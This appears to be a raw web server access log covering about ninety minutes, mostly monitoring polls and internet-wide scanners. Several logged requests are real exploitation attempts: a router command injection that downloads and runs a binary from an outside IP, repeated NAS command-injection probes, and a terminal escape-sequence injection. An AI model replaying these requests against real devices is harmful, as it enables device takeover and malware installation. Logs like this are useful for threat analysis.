212.91.246.72 - - [03/May/2024:21:45:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.38.111 - - [03/May/2024:21:46:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/May/2024:21:46:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:21:47:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:21:48:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.22.90.112 - - [03/May/2024:21:49:45 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.22.90.112 - - [03/May/2024:21:49:45 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.22.90.112 - - [03/May/2024:21:49:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.22.90.112 - - [03/May/2024:21:49:45 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
165.22.90.112 - - [03/May/2024:21:49:45 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
165.22.90.112 - - [03/May/2024:21:49:45 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.22.90.112 - - [03/May/2024:21:49:45 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.22.90.112 - - [03/May/2024:21:49:46 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.22.90.112 - - [03/May/2024:21:49:46 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.22.90.112 - - [03/May/2024:21:49:46 +0200] "GET /bundle.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.22.90.112 - - [03/May/2024:21:49:46 +0200] "GET /files/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.22.90.112 - - [03/May/2024:21:49:46 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.22.90.112 - - [03/May/2024:21:49:46 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.22.90.112 - - [03/May/2024:21:49:46 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.246.72 - - [03/May/2024:21:49:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:21:50:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:21:51:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:21:52:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.225 - - [03/May/2024:21:52:59 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [03/May/2024:21:53:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:21:54:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:21:55:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
23.26.77.173 - - [03/May/2024:21:56:34 +0200] "GET /.env HTTP/1.1" 404 309 "-" "-"
212.91.246.72 - - [03/May/2024:21:56:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:21:57:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:21:58:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:21:59:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.140.6 - - [03/May/2024:22:00:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/May/2024:22:00:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:01:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.38.111 - - [03/May/2024:22:02:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
103.245.236.120 - - [03/May/2024:22:02:37 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 326 "-" "-"
103.245.236.120 - - [03/May/2024:22:02:38 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 328 "-" "-"
212.91.246.72 - - [03/May/2024:22:02:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:03:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:04:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:05:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.51 - - [03/May/2024:22:06:56 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.51 - - [03/May/2024:22:06:57 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/May/2024:22:06:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:07:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.250 - - [03/May/2024:22:08:21 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [03/May/2024:22:08:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:09:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:10:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:11:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:12:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:13:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:14:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.38.111 - - [03/May/2024:22:15:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/May/2024:22:15:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.38.111 - - [03/May/2024:22:16:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/May/2024:22:16:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:17:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:18:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
84.54.51.41 - - [03/May/2024:22:19:16 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
177.126.59.125 - - [03/May/2024:22:19:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [03/May/2024:22:19:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:20:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:22:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:23:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:24:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.255.149.49 - - [03/May/2024:22:24:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [03/May/2024:22:25:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.245.236.120 - - [03/May/2024:22:25:54 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 326 "-" "-"
103.245.236.120 - - [03/May/2024:22:25:54 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 328 "-" "-"
94.156.79.234 - - [03/May/2024:22:25:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:35.0) Gecko/20100101 Firefox/35.0"
212.91.246.72 - - [03/May/2024:22:26:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:27:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.136 - - [03/May/2024:22:27:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/May/2024:22:28:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:29:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:30:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:31:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:32:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:33:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:34:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:35:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:36:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:37:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:38:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:39:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:40:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.203.211.250 - - [03/May/2024:22:40:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [03/May/2024:22:41:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.38.111 - - [03/May/2024:22:41:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/May/2024:22:42:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:43:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:44:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:45:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:46:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:47:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:48:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:49:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.202 - - [03/May/2024:22:49:26 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [03/May/2024:22:50:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:51:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:52:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.226.121.172 - - [03/May/2024:22:52:47 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 327 "-" "Go-http-client/1.1"
64.226.121.172 - - [03/May/2024:22:52:47 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/May/2024:22:53:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:54:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
168.62.211.180 - - [03/May/2024:22:54:08 +0200] "GET /%1b%5d%32%3b%6f%77%6e%65%64%07%0a necho -en \"GET /\x1b]2;owned?\x07" 404 312 "-" "-"
212.91.246.72 - - [03/May/2024:22:55:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.227.121.40 - - [03/May/2024:22:55:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
64.227.121.40 - - [03/May/2024:22:55:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
64.227.121.40 - - [03/May/2024:22:55:23 +0200] "GET /odinhttpcall1714769707 HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
64.227.121.40 - - [03/May/2024:22:55:23 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
64.227.121.40 - - [03/May/2024:22:55:23 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
64.227.121.40 - - [03/May/2024:22:55:23 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
64.227.121.40 - - [03/May/2024:22:55:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
64.227.121.40 - - [03/May/2024:22:55:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
164.90.229.185 - - [03/May/2024:22:55:23 +0200] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
157.230.19.125 - - [03/May/2024:22:55:23 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
157.230.27.187 - - [03/May/2024:22:55:23 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/May/2024:22:56:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:57:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:22:58:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.38.111 - - [03/May/2024:22:59:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/May/2024:22:59:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:23:00:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.93 - - [03/May/2024:23:00:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [03/May/2024:23:01:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.74 - - [03/May/2024:23:01:29 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.74 - - [03/May/2024:23:01:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/May/2024:23:02:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:23:03:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:23:04:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:23:05:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:23:06:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.245.236.120 - - [03/May/2024:23:06:38 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 326 "-" "-"
103.245.236.120 - - [03/May/2024:23:06:38 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 328 "-" "-"
212.91.246.72 - - [03/May/2024:23:07:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:23:08:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:23:09:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:23:10:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:23:11:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:23:12:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.146.62 - - [03/May/2024:23:12:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.62 - - [03/May/2024:23:12:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.62 - - [03/May/2024:23:12:29 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.146.62 - - [03/May/2024:23:12:29 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [03/May/2024:23:13:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:23:14:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:23:15:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:23:16:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:23:17:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:23:18:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.145.99 - - [03/May/2024:23:18:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.99 - - [03/May/2024:23:18:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.99 - - [03/May/2024:23:18:59 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.145.99 - - [03/May/2024:23:18:59 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
185.191.126.213 - - [03/May/2024:23:19:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/May/2024:23:19:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:23:20:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/May/2024:23:20:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [03/May/2024:23:21:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/May/2024:23:21:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:23:22:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:23:23:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
